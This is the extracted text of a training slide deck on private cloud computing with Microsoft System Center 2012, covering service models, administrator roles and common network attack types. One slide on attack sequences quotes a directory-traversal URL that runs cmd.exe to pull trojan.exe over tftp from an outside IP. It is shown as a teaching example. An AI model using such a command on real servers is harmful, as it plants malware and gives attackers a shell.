Securing The CloudWhat is the Cloud? How do you lock it down?

Kevin King - Senior Technical Instructor ● Infrastructructure/Cloud Consulting| MCT CCSI MCSE-Private Cloud MCSA MCSA-Server 2012 MCSE CCNA Data Center Cisco Quality Instructor 2014 New Horizons CLC|  6700 Jefferson, Building A  |  Albuquerque, NM 87109 p: 505.830.7100 |f: 505.830.2239 | kking@nhabq.com | www.nhabq.com

1. Introduction to the Private Cloud

2. Securing the Private Cloud

Overview• Overview of the Cloud Computing Model

• Requirements for the Private Cloud

• Operating a Private Cloud Infrastructure with System Center

• Securing the Cloud

1) Overview of the Cloud Computing Model

• The Advent of Cloud Computing

• Public vs. Private Clouds

• Cloud Service Models

• Methods to Implement the Private Cloud

• System Center 2012 and the Private Cloud

The Advent of Cloud Computing

Advantages of cloud computing include:

Virtualized data center

Reduced operational costs

Server consolidation

Improved resiliency and agility

Client/Server Architecture Cloud Computing

Public vs. Private CloudsPrivate cloud:

Provides more control

Is flexible

Is customizable Has operational and management costs

Public cloud:

Provides less control

Provides less flexibility

Provides less customization Reduced operational and management costs

The three cloud service models are:

Cloud Service Models

Software as a Service(SaaS)

Includes business processes and applications

Platform as a Service(PaaS)

Includes application execution services

Infrastructure as a Service(IaaS)

Includes server, storage, and network infrastructure

Methods to Implement the Private Cloud

High LowDeployment Time

Low

Hig

hLe

vel of

Pre

-inte

gra

tion

Custom

ReferenceArchitecture

Service Provider

System Center 2012 and the Private Cloud

System Center 2012 has the following components: • App Controller• Service Manager• Virtual Machine Manager (VMM)• Orchestrator• Operations Manager• Data Protection Manager (DPM)• Configuration Manager

2) Requirements for the Private Cloud

• Key Business Requirements

• Service Identification and Onboarding

• Datacenter Administrators and Business Unit IT Administrators

Key Business RequirementsThe key business requirements include:

Competitive advantage

Scalability

Reduced cost

Service Identification and Onboarding

• Service Identification:• Does the application need to reside in the same location as the data?• What computer resources are required?• What are the software or operating system requirements?• What network bandwidth will be required by the application between the

users and the cloud?

• Onboarding:• Has the service passed the identity check and is it ready for the cloud?• Have relevant backups taken place?• Has the migration been tested successfully in a pre-production or UAT

environment?• Is there a documented method for fallback?

Datacenter Administrators and Business Unit IT AdministratorsThe datacenter administrator:

Manages the physical infrastructure

Manages the private cloud resources

Datacenter Administrator

Configures access to cloud resources

The business unit IT administrator:

Manages the business unit cloud

Manages resources specific to the business unit cloud that they own

Business Unit IT Administrator

3) Operating a Private Cloud Infrastructure with System Center

• Provisioning the Private Cloud with Virtual Machine Manager

• Managing Public and Private Clouds with App Controller

• Service Management with Service Manager

• Automating Data Center Processes with Orchestrator

• A simple private cloud is created in Virtual Machine Manager by using the Create Cloud Wizard:

Provisioning the Private Cloud with Virtual Machine Manager

Managing Public and Private Clouds with App Controller

Using the App Controller Portal, you can manage private clouds that were created with VMM and public clouds that were created on the Windows Azure platform

Service Management with Service ManagerService Manager delivers an integrated platform for automating and adapting IT service management best practices to your organization's requirements

By using Service Manager, you can: Reduce mean time to resolution of issues through a self-service user experience Improve private cloud efficiency through centralized management of change processes Provide self-service provisioning of private cloud resources Implement compliance controls for the management of the private cloud infrastructure

Automating Data Center Processes with Orchestrator

Orchestrator provides a workflow management solution for the data center that allows you to automate the creation, monitoring, and deployment of resources in your environment

By using Orchestrator, you can: Automate processes in your private cloud Improve operational efficiency Connect different systems from different vendors without the knowledge of scripting languages

4) Securing the Private Cloud• Old days – security = planting two firewalls

• Today – security = very complex problem

Types of Attacks

Including, but not limited to:• Packet sniffing— An application that uses the promiscuous mode of the

network adapter to capture all networks packets.• IP spoofing— An attack in which a hacker assumes an IP address of

others to conceal its true identity• Denial-of-service (DoS) attack— Aims to overwhelm a service so as to

deny legitimate requests from being serviced. The service may be in the form of bandwidth, memory, or CPU. It is the most well-known of all Internet attacks, and efforts should be invested in understanding its mechanisms. Some of the more famous DoS attacks include the following:• Code Red• Blaster• Ping of Death• Trinity

Types of attacks

• Password attack— As its name implies, this attack intends to acquire passwords to important assets so as to cause further damage. Password attacks can be achieved through other methods previously mentioned, such as IP spoofing, or they can be achieved via brute force

• Man-in-the-middle attack— This type of attack happens when a hacker manages to position himself between the source and the destination of a network transaction. ARP cache poisoning is one common method

• Application attack— This type of attack happens when application software holes are exploited to gain access to a computer system. The holes may be bugs or may be TCP port numbers that are exposed

• Port redirection attack— This type of attack makes use of a compromised host to gain access to a network that is otherwise protected

• Blue Pilling

Sequence of attacks

• After a phase of probing/scanning, the hacker detects the vulnerability of the web/application server

• The hacker exploits the vulnerability to get a shell

• For example:• Copy the Trojan on the web/application server:

• HTTPS://www.example.com/scripts/..%c0%af../winnt/system32/cmd.exe?/c+tftp%20-i%2010.20.15.15%20GET%20trojan.exe%20trojan.exe

Server Farm Security Strategies

Segmenting the Server Farm

Building the Firewall Ruleset

From Physical Separation to Logical Separation

Securing The Cloud

System Center 2012 has the following components:

• App Controller• Service Manager• Virtual Machine Manager (VMM)• Orchestrator• Operations Manager• Data Protection Manager (DPM)• Configuration Manager

SURFACE

AREA

Public vs. Private CloudsPhysical:

Physical access to equipment

OOB Management

Password Policy Host Security

Logical:

System Center Components

Individual VMs

Services and Apps Passwords/Encryption/Least Privledge

Click icon to add picture